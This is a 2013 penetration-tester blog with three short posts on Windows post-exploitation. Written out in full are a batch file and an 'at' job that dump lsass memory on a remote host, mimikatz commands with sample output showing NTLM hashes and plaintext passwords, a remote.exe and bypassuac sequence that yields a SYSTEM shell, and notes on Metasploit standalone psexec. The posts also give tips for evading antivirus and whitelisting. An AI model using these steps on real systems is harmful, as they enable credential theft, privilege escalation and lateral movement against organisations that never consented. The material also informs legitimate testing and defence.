Wednesday, July 31, 2013

Mimikatz Minidump and mimikatz via bat file

I tweeted about this blog post a few weeks ago and got to use it on a PT, so its no secret...

also mubix beat me to this post, but i'm posting it here for my notes keeping purposes

First, check out this post by the mimikatz author.  Now, one of the twitter comments I received was: "duh anyone can right click and dump process memory to a file". Unfortunately i'm rarely sitting with a GUI and can just "right click" but i do usually have the ability to "net use" and create scheduled tasks.  The cool thing about AT jobs and scheduled tasks is that if you run them as "admin" they really get run as SYSTEM, so you can do neat stuff like dump lsass memory or get SYSTEM shells when the job executes your binary.

So quickly how I've been doing it.

Once you have creds, you net use the remote box and copy over procdump.exe and procdump.bat

contents of procdump.bat


@echo off
C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\somethingwindows.dmp 2>&1

then just create an "at" job to run it for you

at \\192.168.1.3 20:55 C:\windows\temp\procdump.bat


From there you'll have a dump file, copy it back from the remote host and use mimikatz alpha to retrieve the creds from the dump file:  from the mimikatz blog post:


mimikatz # sekurlsa :: minidump lsass.dmp
Switch to minidump

mimikatz # sekurlsa :: logonPasswords

Authentication Id: 0; 141237
User Name: sekur_000
Domain: WINDOWS-8
        msv:
         * Username: sekurlsa@live.fr
         * Domain: MicrosoftAccount
         * LM: d0e9aee149655a6075e4540af1f22d3b
         * NTLM: cc36cf7a8514893efccd332446158b1a
        tspkg:
         * Username: sekurlsa@live.fr
         * Domain: MicrosoftAccount
         * Password: waza1234 /
        WDigest:
         * Username: sekurlsa@live.fr
         * Domain: MicrosoftAccount
         * Password: waza1234 /
        livessp:
         * Username: sekurlsa@live.fr
         * Domain: ps: password
         * Password: waza1234 /
        kerberos:
        ssp:

Why not just push up mimikatz?  Well, mimikatz you download is now tagged by AV, so you can compile you own and get around that, white listing tools should prevent mimikatz from running but will probably allow sysinternals tools or powershell,  but mostly this method make it so you don't need a meterpreter sessions or other type of interactive shell on the remote host. run bat file, get your dump file, and get creds offline.

------

if for some reason you want to run mimikatz via a bat file you can use the following commands

type schtask.bat

C:\temp\mimikatz64.exe "sekurlsa::logonPasswords full" exit >> C:\temp\mimi.txt

then you can run it with an at job.

-CG

Monday, July 29, 2013

admin to SYSTEM win7 with remote.exe

So i ran across this little gem from 2008!

http://blogs.technet.com/b/askds/archive/2008/10/22/getting-a-cmd-prompt-as-system-in-windows-vista-and-windows-server-2008.aspx

I ended up using Method 2 on a recent test. The post above calls for needing an elevated command shell so you can call "at".  This is easy if you are legitimately sitting in front of the box but if you pentesting, potentially harder.

Three scenarios:

  • user is regular user and cant UAC to let you run admin commands
  • user is local admin and UAC disabled.
  • user is local admin buy you have to bypass UAC


easiest way sitting on a command shell is probably just to type "at"\

ohh man, denied :-(








yay!








Scenario 1, your screwed, gonna have to solve the not admin problem first.


anger!













Scenario 2, no UAC...just follow the linked blog post. Get a copy of remote.exe either x86 or x64 whatever architecture the system you want to run it on is and do the following command:

AT #TIME_TO_RUN c:\pathto\remote.exe /s cmd SYSCMD

once it runs, connect to the debugger you started (with SYSTEM privs)

C:\path\REMOTE.EXE /c SYSTEM_NAME SYSCMD

you should see something like this:

C:\pathto\>remotex64.exe /c WPAD SYSCMD
**************************************
***********     REMOTE    ************
***********     CLIENT    ************
**************************************
Connected...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
**Remote: Connected to WPAD CG [Fri 4:23 PM]


C:\Windows\system32>whoami
whoami
nt authority\system

weeeeeeeeeeeeeeeeeeee!





















Scenario 3, you can use bypassuac to get around our UAC issues.

get bypassuac on your system, then run it like so

C:\pathto\>at
Access is denied.

C:\pathto\>bypassuac.exe
Too few arguments
Incorrect input. Please find samples below.
Note, 'elevate stuff' will be executed in the elevated shell as 'cmd.exe stuff'

        elevate /c
        elevate /c [arg1] [arg2] .. [argn]
        elevate --pid 1234 /c [arg1] [arg2] .. [argn]
        elevate /c c:\path\foo.exe [arg1] [arg2] .. [argn]
        elevate --pid 1234 /c c:\path\foo.exe [arg1] [arg2] .. [argn]

C:\pathto\>bypassuac.exe /c at 16:32 C:\pathtop\remotex64.exe /s cmd SYSCMD
Added a new job with job ID = 31

C:\pathto\>at
Access is denied.

dont worry,  it worked :-)

C:\pathto\>remotex64.exe /c WPAD SYSCMD
**************************************
***********     REMOTE    ************
***********     CLIENT    ************
**************************************
Connected...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
**Remote: Connected to WPAD CG [Fri 4:32 PM]


C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>



Friday, July 26, 2013

Metasploit Standalone psexec

mubix has a great post here on using the standalone psexec in the tools folder for metasploit.

couple of notes since i had to use it this week.

1.  its now librex instead of rex that should save you a few minutes of debugging the cant find rex/proto error :-)

2. make sure you comment out the stuff Rob mentions to  here:


3. the ocra stuff works as described.

4. the exe option is important as the metasploit psexec doesn't behave like sysinternals psexec.


The exe needs to be a service binary, so you cant just call cmd.exe like you can with the sysinternals psexec.
Normally metasploit uploads a service binary that kicks off your msf payload so in this case you need a binary that behaves like a service. Rob gives us a hint with the one he uses in the example (adduser.exe).


so find yourself a service bin to do whatever it is you want it to do and use that with your standalone psexec. I ended up using an exe that made a local admin user and then used that for follow on stuff, not optimal but was in a tight spot (hence using the standalone psexec to start with)

yup i stole mubix's pictures...he said it was ok.

-CG